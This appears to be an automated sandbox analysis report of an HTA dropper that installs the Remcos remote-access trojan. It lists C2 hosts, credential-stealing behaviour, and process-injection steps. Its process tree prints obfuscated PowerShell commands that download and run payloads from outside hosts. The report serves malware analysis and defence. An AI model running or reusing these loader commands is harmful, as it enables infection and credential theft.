Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-11-2024 16:57
Static task
static1
Behavioral task
behavioral1
Sample
seethebestthingswithgoodthingswithgreatthignsfor.hta
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
seethebestthingswithgoodthingswithgreatthignsfor.hta
Resource
win10v2004-20241007-en
General
-
Target
seethebestthingswithgoodthingswithgreatthignsfor.hta
-
Size
281KB
-
MD5
b36b8c1d87172cd3d7646f53a58d4936
-
SHA1
f816a31bcb508052f54fa572eddf2e84ed7eef0c
-
SHA256
134d52fbb53944f8d09eb33663c83f406e5fa15996afe1bb7e95eeef99298821
-
SHA512
188c4f4b2a3e8659edf4fb88dd8cea3d91c3a44caa5b9350705393b65272538b63b581f6a044b2d24f74b1ba42cd2f9328e5253a690182235b093cd7ee57bf8e
-
SSDEEP
48:4FhWsTROELdn97g5un7MqnQKb4VwoIADQKp4VwoIA8S29++RWPi+8d6Ba5L1nNQk:43FZ97HnQ8iQsrkV8d6Ba1jQtQsMpQpQ
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Extracted
remcos
RemoteHost
shlobo.duckdns.org:9687
shlobo.duckdns.org:9374
shlobo.duckdns.org:8764
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-U2TQ1C
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
Processes:
resource yara_rule behavioral2/memory/4944-131-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/1072-130-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/4140-129-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral2/memory/4944-131-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/1072-130-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 3 IoCs
Processes:
powerSHELl.eXEpowershell.exeflow pid Process 15 3424 powerSHELl.eXE 20 3228 powershell.exe 25 3228 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid Process 1220 powershell.exe 3228 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
Processes:
powerSHELl.eXEpowershell.exepid Process 3424 powerSHELl.eXE 1528 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exeWScript.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
CasPol.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts CasPol.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exeCasPol.exedescription pid Process procid_target PID 3228 set thread context of 1660 3228 powershell.exe 105 PID 1660 set thread context of 1072 1660 CasPol.exe 107 PID 1660 set thread context of 4944 1660 CasPol.exe 108 PID 1660 set thread context of 4140 1660 CasPol.exe 109 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exeCasPol.exeCasPol.exeCasPol.exemshta.exeWScript.execsc.execvtres.exepowershell.exeCasPol.exepowerSHELl.eXEpowershell.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powerSHELl.eXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Modifies registry class 1 IoCs
Processes:
powerSHELl.eXEdescription ioc Process Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings powerSHELl.eXE -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
powerSHELl.eXEpowershell.exepowershell.exepowershell.exeCasPol.exeCasPol.exepid Process 3424 powerSHELl.eXE 3424 powerSHELl.eXE 1528 powershell.exe 1528 powershell.exe 1220 powershell.exe 1220 powershell.exe 3228 powershell.exe 3228 powershell.exe 1072 CasPol.exe 1072 CasPol.exe 4140 CasPol.exe 4140 CasPol.exe 1072 CasPol.exe 1072 CasPol.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
CasPol.exepid Process 1660 CasPol.exe 1660 CasPol.exe 1660 CasPol.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powerSHELl.eXEpowershell.exepowershell.exepowershell.exeCasPol.exedescription pid Process Token: SeDebugPrivilege 3424 powerSHELl.eXE Token: SeDebugPrivilege 1528 powershell.exe Token: SeDebugPrivilege 1220 powershell.exe Token: SeDebugPrivilege 3228 powershell.exe Token: SeDebugPrivilege 4140 CasPol.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
CasPol.exepid Process 1660 CasPol.exe -
Suspicious use of WriteProcessMemory 43 IoCs
Processes:
mshta.exepowerSHELl.eXEcsc.exeWScript.exepowershell.exepowershell.exeCasPol.exedescription pid Process procid_target PID 3912 wrote to memory of 3424 3912 mshta.exe 86 PID 3912 wrote to memory of 3424 3912 mshta.exe 86 PID 3912 wrote to memory of 3424 3912 mshta.exe 86 PID 3424 wrote to memory of 1528 3424 powerSHELl.eXE 88 PID 3424 wrote to memory of 1528 3424 powerSHELl.eXE 88 PID 3424 wrote to memory of 1528 3424 powerSHELl.eXE 88 PID 3424 wrote to memory of 1068 3424 powerSHELl.eXE 94 PID 3424 wrote to memory of 1068 3424 powerSHELl.eXE 94 PID 3424 wrote to memory of 1068 3424 powerSHELl.eXE 94 PID 1068 wrote to memory of 3448 1068 csc.exe 95 PID 1068 wrote to memory of 3448 1068 csc.exe 95 PID 1068 wrote to memory of 3448 1068 csc.exe 95 PID 3424 wrote to memory of 4532 3424 powerSHELl.eXE 98 PID 3424 wrote to memory of 4532 3424 powerSHELl.eXE 98 PID 3424 wrote to memory of 4532 3424 powerSHELl.eXE 98 PID 4532 wrote to memory of 1220 4532 WScript.exe 99 PID 4532 wrote to memory of 1220 4532 WScript.exe 99 PID 4532 wrote to memory of 1220 4532 WScript.exe 99 PID 1220 wrote to memory of 3228 1220 powershell.exe 101 PID 1220 wrote to memory of 3228 1220 powershell.exe 101 PID 1220 wrote to memory of 3228 1220 powershell.exe 101 PID 3228 wrote to memory of 1660 3228 powershell.exe 105 PID 3228 wrote to memory of 1660 3228 powershell.exe 105 PID 3228 wrote to memory of 1660 3228 powershell.exe 105 PID 3228 wrote to memory of 1660 3228 powershell.exe 105 PID 3228 wrote to memory of 1660 3228 powershell.exe 105 PID 3228 wrote to memory of 1660 3228 powershell.exe 105 PID 3228 wrote to memory of 1660 3228 powershell.exe 105 PID 3228 wrote to memory of 1660 3228 powershell.exe 105 PID 3228 wrote to memory of 1660 3228 powershell.exe 105 PID 3228 wrote to memory of 1660 3228 powershell.exe 105 PID 1660 wrote to memory of 1072 1660 CasPol.exe 107 PID 1660 wrote to memory of 1072 1660 CasPol.exe 107 PID 1660 wrote to memory of 1072 1660 CasPol.exe 107 PID 1660 wrote to memory of 1072 1660 CasPol.exe 107 PID 1660 wrote to memory of 4944 1660 CasPol.exe 108 PID 1660 wrote to memory of 4944 1660 CasPol.exe 108 PID 1660 wrote to memory of 4944 1660 CasPol.exe 108 PID 1660 wrote to memory of 4944 1660 CasPol.exe 108 PID 1660 wrote to memory of 4140 1660 CasPol.exe 109 PID 1660 wrote to memory of 4140 1660 CasPol.exe 109 PID 1660 wrote to memory of 4140 1660 CasPol.exe 109 PID 1660 wrote to memory of 4140 1660 CasPol.exe 109
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswithgoodthingswithgreatthignsfor.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE"C:\Windows\SYSteM32\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE" "poWERSheLL.ExE -ex BYPASs -nOP -W 1 -c dEViCECRedeNTIaLdePLOymenT ; IeX($(IeX('[SYsTEM.TEXT.EncodiNG]'+[CHar]58+[CHAR]0x3a+'UTF8.GetStRing([sYSTEm.coNverT]'+[chaR]0x3A+[chaR]58+'froMbase64String('+[cHAR]0x22+'JGtrUUk4aCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRUZpbklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFVWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6bSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0dqbVhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWVZsc3VVTixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3FCamhCSkdxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJaIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdmV0NjeUhvR0wgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAka2tRSThoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjQ2LjE3OC4xOTIvMzUvc2VldGhlYmVzdGdpcmxzZXZlcmRpZGJlc3R0aGlnbnN3aXRobXlzZWxmLnRJRiIsIiRFTnY6QVBQREFUQVxzZWV0aGViZXN0Z2lybHNldmVyZGlkYmVzdHRoaWducy52YnMiLDAsMCk7c1RBclQtU2xlRXAoMyk7c3RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVxzZWV0aGViZXN0Z2lybHNldmVyZGlkYmVzdHRoaWducy52YnMi'+[cHar]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3424 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYPASs -nOP -W 1 -c dEViCECRedeNTIaLdePLOymenT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ttk1ndd0\ttk1ndd0.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9664.tmp" "c:\Users\Admin\AppData\Local\Temp\ttk1ndd0\CSCD13CE69C3ABA435D9E52E09D9D384042.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:3448
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestgirlseverdidbestthigns.vbs"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQc2hPTWVbNF0rJHBzSG9tRVszMF0rJ3gnKSggKCgnQU04aW1hZ2VVcmwgPSB5OWNuaHR0cHM6Ly8xMDE3LmZpbGVtJysnYWlsLmNvbS9hJysncGkvZicrJ2lsZS9nZXQ/ZmlsZWtleT0yQWFfYldvOVJldTQ1dDdCVTEnKydrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY18nKydUMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiB5OWNuO0FNOHdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7QU04aW1hZ2VCeXRlcyA9IEFNJysnOHdlYkNsaWVudC5Eb3dubG9hZERhdGEoQU04aW1hZ2UnKydVcmwpO0FNOGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKEFNJysnOGltYWdlQnl0ZScrJ3MpO0FNOHN0YXJ0RmxhZyA9IHk5Y248PCcrJ0JBU0U2NF9TVEFSVD4+eTljbjtBTThlbmRGbGFnJysnID0geTljbjw8QkEnKydTRTY0JysnX0VORD4+eTljbjtBTThzdGFydEluZGV4ID0gQScrJ004aW1hZ2VUZXh0LicrJ0luJysnZGV4T2YoQU04c3RhcnRGbGFnJysnKTtBJysnTThlbmRJbmRleCA9IEFNOGltYWdlVGV4dC5JbmRleE9mKEFNOGVuZEZsYWcpO0FNOHN0YXJ0SW5kZXggLWdlIDAgLWFuZCBBTThlbmRJbmRleCAtZ3QgQU04c3RhcnRJbicrJ2QnKydleDtBTThzdGFydEluZGV4ICs9IEFNOHN0YXJ0RmxhZy5MZScrJ25ndCcrJ2g7QU04YmFzZTY0TGVuZ3RoID0gQU04ZW5kSW5kZXggLSBBTThzdGFydEluZGV4JysnO0FNOGJhc2U2NENvbW1hbmQgPSBBTThpbWFnZVRleHQuU3ViJysnc3RyaScrJ25nKEFNOHN0YXJ0SW5kZXgsIEFNOGJhc2U2NExlbmd0aCk7JysnQU04JysnYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoQU04YmFzZTY0Q29tbWFuZC4nKydUb0NoYXJBcnJheSgpIFBNVzYgRm9yRWFjaC1PYmplY3QgeyBBTThfIH0pWy0xLi4tKEFNOGJhc2UnKyc2NENvbW1hbmQuTGVuZ3RoKV07JysnQU0nKyc4Y29tbWFuJysnZEJ5dGVzID0gW1MnKyd5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhBTThiYXNlNjRSZXZlcnNlZCk7QU04bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEFNOGNvbW1hbmRCeXRlcyk7QU04dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh5OWNuVkFJeTljbik7QU04dmFpTWV0aG9kLkknKydudm9rZShBTThudWxsLCBAKHk5Y250eHQuRVJGVkdSRkUvNTMvMjkxLjg3MS42NC44OTEvLzpwdHRoeTljbiwgeTljbmRlc2F0JysnaXZhZG95OWNuLCB5OWNuZGVzYXRpdmFkb3k5Y24nKycsIHk5Y25kZXNhdGl2YWRveTljbiwgeTljbkNhc1BvbHk5YycrJ24sIHk5Y25kZXNhdGl2YWRveScrJzljbiwgeTljbmRlc2F0aXZhZG95OWNuLHk5Y25kZXNhdGl2YWRveTljJysnbix5OWNuZGVzYXRpdmFkb3k5Y24seTljbmRlc2F0aXZhZG95OWNuLHk5JysnY25kZXNhdGl2YWRveTljbix5OWNuZGVzYXQnKydpdmFkb3k5Y24seTljbjF5OWNuLHk5Y25kZXNhdGl2YWRveTljbikpOycpICAtY1JlcGxBY2UnUE1XNicsW0NoQVJdMTI0ICAtY1JlcGxBY2UoW0NoQVJdMTIxK1tDaEFSXTU3K1tDaEFSXTk5K1tDaEFSXTExMCksW0NoQVJdMzktcmVQTEFjZShbQ2hBUl02NStbQ2hBUl03NytbQ2hBUl01NiksW0NoQVJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PshOMe[4]+$psHomE[30]+'x')( (('AM8imageUrl = y9cnhttps://1017.filem'+'ail.com/a'+'pi/f'+'ile/get?filekey=2Aa_bWo9Reu45t7BU1'+'kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_'+'T35w&pk_vid=fd4f614bb209c62c1730945176a0904f y9cn;AM8webClient = New-Object System.Net.WebClient;AM8imageBytes = AM'+'8webClient.DownloadData(AM8image'+'Url);AM8imageText = [System.Text.Encoding]::UTF8.GetString(AM'+'8imageByte'+'s);AM8startFlag = y9cn<<'+'BASE64_START>>y9cn;AM8endFlag'+' = y9cn<<BA'+'SE64'+'_END>>y9cn;AM8startIndex = A'+'M8imageText.'+'In'+'dexOf(AM8startFlag'+');A'+'M8endIndex = AM8imageText.IndexOf(AM8endFlag);AM8startIndex -ge 0 -and AM8endIndex -gt AM8startIn'+'d'+'ex;AM8startIndex += AM8startFlag.Le'+'ngt'+'h;AM8base64Length = AM8endIndex - AM8startIndex'+';AM8base64Command = AM8imageText.Sub'+'stri'+'ng(AM8startIndex, AM8base64Length);'+'AM8'+'base64Reversed = -join (AM8base64Command.'+'ToCharArray() PMW6 ForEach-Object { AM8_ })[-1..-(AM8base'+'64Command.Length)];'+'AM'+'8comman'+'dBytes = [S'+'ystem.Convert]::FromBase64String(AM8base64Reversed);AM8loadedAssembly = [System.Reflection.Assembly]::Load(AM8commandBytes);AM8vaiMethod = [dnlib.IO.Home].GetMethod(y9cnVAIy9cn);AM8vaiMethod.I'+'nvoke(AM8null, @(y9cntxt.ERFVGRFE/53/291.871.64.891//:ptthy9cn, y9cndesat'+'ivadoy9cn, y9cndesativadoy9cn'+', y9cndesativadoy9cn, y9cnCasPoly9c'+'n, y9cndesativadoy'+'9cn, y9cndesativadoy9cn,y9cndesativadoy9c'+'n,y9cndesativadoy9cn,y9cndesativadoy9cn,y9'+'cndesativadoy9cn,y9cndesat'+'ivadoy9cn,y9cn1y9cn,y9cndesativadoy9cn));') -cReplAce'PMW6',[ChAR]124 -cReplAce([ChAR]121+[ChAR]57+[ChAR]99+[ChAR]110),[ChAR]39-rePLAce([ChAR]65+[ChAR]77+[ChAR]56),[ChAR]36) )"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\oqamudsefzxubcffwstba"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1072
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\zkgeuvdxthpzlqtrncnddmlm"7⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:4944
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\bmtxvoorhphmowpvxnaworgvzeps"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4140
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
102B
MD5ec4f509f9f4b3b8421920e041d0e2fb8
SHA15cee677e9e20bc9bb2a9ca23106da533d81b2b00
SHA25649f7d448f66eac13abeb7bf296f6443c7b643fc7ab39703acfc9b882851a6d35
SHA512e9d7d67d9d47e2744e5408b45bbfeb448d130238152a78415b6611b99eb44a1d45f889e4e0a75e712541122f40030d08369b0ffb14e36ceb2fe984c23cd53c2e
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
12KB
MD5f6e3380275aaaaca9f8590cd6a4799c5
SHA157d44d08df5eef95522927b72f32ce632dc33023
SHA25609fbf5047273386f082b10758c13e54f10804f99357fac2e029e006f19edd965
SHA51290194e77a76aa23145c753732d4b13e030de307afdda77897375c5f4c854d0c08523d7a7eccfee8ae3338cf81d9d2bec72091bdb3c9e90a34036c3d1a90e0ba1
-
Filesize
18KB
MD515456a5c09cc22fa355b2e615b485813
SHA147a44aefb3ec5df806ed63e8987836e5c99b9c90
SHA256fc6916cab883c538cdb0903a86649b42e4bea48897e7904084c17af5a33188c4
SHA5122d94a1b6c806642c0e0404b908a2f43b7ee6fcb05447cb3f68ad4ae0f1f19194aa0a100864cb2aa08c2de5c5b2969f33932358eea94c089c6dc99cf7e2657062
-
Filesize
1KB
MD5cd1d6ebb844feaab4dcf017932c546b1
SHA16806659cf5ed03b786aee5ea7846b6baa96e4882
SHA25675f469e974f77cbc719090600ec3baf89edddf62c6f8ce0ec1027386874f6c91
SHA512207bb866066cf3cb59bdb9d2eb314a3e2697a4be2e1acdd9de74fdaf79663ba94b311b220ed1c2fea3942713da0b536adab076f458d9fde6f801708062345966
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD579f35c7500a5cc739c1974804710441f
SHA124fdf1fa45049fc1a83925c45357bc3058bad060
SHA256897101ed9da25ab0f10e8ad1aeb8dabc3282ccfdb6d3171dbac758117b8731f4
SHA51203281e8abecff4e7d1f563596a4fd2513e016b7fbf011a455141460f9448d00b4a4666d2036cb448a8ac9a6feebeb51b366289ffa2ee5524a062fe8869aec61e
-
Filesize
3KB
MD533c218c6a023474d5009560a703321ae
SHA108feb6bf8448a02cdd4117b79e2e5fcd53f41920
SHA2564a40f2e65053ecfd480f0d7b266c7d93ca1e0d3e9e30a8eaf05a07c74bbfcff4
SHA51236a7752fce4ef5aa283291e04458a258a8f4dcec3ad4ea58902289826c64ad80cf4483abc0b48c95420357efbfd4fe46ada3ecca1474c954de96d305f05f2090
-
Filesize
138KB
MD58e033f9bcfdc081ed84adcbf69b2cfed
SHA129919300cdba9322ec872189cea15ff7d573fc42
SHA2564d489671247459e4b2c1403511606a2463199f1a5044d7e1841e5387b8c86e0a
SHA51258fca96df828c75274613291f1048228076ef0516d4bcdd4e51cba3d9c9c566b6ce5f03387bfd60cb627bbd8a799b37593fd3624574afd50f6df6f9777754ac0
-
Filesize
652B
MD5e61bf3a4f4e429954fe9a30eeb27d236
SHA193fb9a59a680703b952825d03ee26d9f9de1ee43
SHA2561d5224bae9d877e37cd81423e7ec6945fa8ff8351347253247d60db23762d2a0
SHA512a2945a998d83bd388a74f95e8e7d190751687bc70089454832497022854411f90ac167d320cda149999c5faf2fe14a52375329d05d962d4971c5776b665aaf88
-
Filesize
464B
MD539d4a6691d37c11ed58d537b74f12aad
SHA1caa119f2a0ad6f53ddb8a2447b379ac5ed11c1d6
SHA2560ad0cda12412bd6fa525c0e4f876fb02a55a98e7555e5a43423c577465611df1
SHA512f4d2f58e0c3a15aec4dd83b4268e9a4c1f3b5ef3c735204457e2115b9835af874f4d34b7311a182e7b395888b523e9f46bb8b6ca08db60ad9eda04b89013813c
-
Filesize
369B
MD50ede2df604e147f5eb1c311b1721d351
SHA123333ef884816d64339eb5f8f5a87282404e0640
SHA256526748a6a92d383ebf7ab651d7224aafed1bb56aa1a66a484d552cb3535b7a54
SHA512710294fab258fc9786bbbebf5daafbf69ffbe1af946febe0c91baa7366739757ee2b4de9561f4bf01b01729dbf4860ee7088589d9ca999bd10d65f0cacd0c5af